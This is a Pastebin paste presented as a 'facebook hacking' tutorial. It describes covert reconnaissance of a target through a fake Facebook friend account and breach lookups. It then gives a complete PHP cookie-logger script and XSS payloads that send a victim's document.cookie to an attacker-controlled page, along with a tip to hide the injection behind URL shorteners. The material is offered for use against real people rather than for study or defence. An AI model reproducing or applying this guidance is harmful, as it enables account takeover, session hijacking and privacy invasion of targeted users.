Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Now we are going to talk about "facebook hacking"
- We start talk about attack types that we CANT do:
- Just forget about sqli and malware..
- The easiest way and realistic to get a users facebook password is to Social engineer or Phishing.
- And that's what we are going to talk about today.
- So lets break down the Social Engineering steps.
- First off you want to harvest as much information of the target as possible.
- Create a fake Facebook account and add the target as friend and collect all info you need.
- Open a yahoo email and import contact from Facebook, if you're lucky, hes email will leak.
- Use google and maltego to find accounts associate with him,
- If you found any email, look it up on haveibeenpwd.
- If you have not found any password yet, i would go for Phishing.
- If you have not read my report on xss, you need to do that now.
- Use the cookie hijacking as explained in the xss tour
- And ho knows, you might be able to find a XSS vuln on Facebook, this you haft to find on your own..
- None will ever share that xss vuln with you
- If you missed my xss writeup on cookie hijack
- Cookie hijacking:
- Put cookie logger script on your webpage and insert it to javascript into xss vulnerable with the cookielogger script address :)
- The rest will script handle
- cookielogger.php
- <*?php
- function GetIP()
- {
- if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown"))
- $ip = getenv("HTTP_CLIENT_IP");
- else if (getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown"))
- $ip = getenv("HTTP_X_FORWARDED_FOR");
- else if (getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown"))
- $ip = getenv("REMOTE_ADDR");
- else if (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], "unknown"))
- $ip = $_SERVER['REMOTE_ADDR'];
- else
- $ip = "unknown";
- return($ip);
- }
- function logData()
- {
- $ipLog="log.txt";
- $cookie = $_SERVER['QUERY_STRING'];
- $register_globals = (bool) ini_get('register_gobals');
- if ($register_globals) $ip = getenv('REMOTE_ADDR');
- else $ip = GetIP();
- $rem_port = $_SERVER['REMOTE_PORT'];
- $user_agent = $_SERVER['HTTP_USER_AGENT'];
- $rqst_method = $_SERVER['METHOD'];
- $rem_host = $_SERVER['REMOTE_HOST'];
- $referer = $_SERVER['HTTP_REFERER'];
- $date=date ("l dS of F Y h:i:s A");
- $log=fopen("$ipLog", "a+");
- if (preg_match("/\bhtm\b/i", $ipLog) || preg_match("/\bhtml\b/i", $ipLog))
- fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE{ : } $date | COOKIE: $cookie
- ");
- else
- fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE: $date | COOKIE: $cookie \n\n");
- fclose($log);
- }
- logData();
- ?>
- Make a tlog.txt and put both of them on your webspace and set "chmod 777".
- Inject the following code in your target
- website:
- http://www.site.com/google.php?search=<script>location.href = 'http://phishingsite.com/cookiestealer.php?cookie='+document.cookie;</script>
- <script>location.href = 'http://phishingsite.com/cookiestealer.php?cookie='+document.cookie;</script>
- use url shortener services such as tinyurl.com or bit.ly to 'hide' your injection script from the victim
Add Comment
Please, Sign In to add comment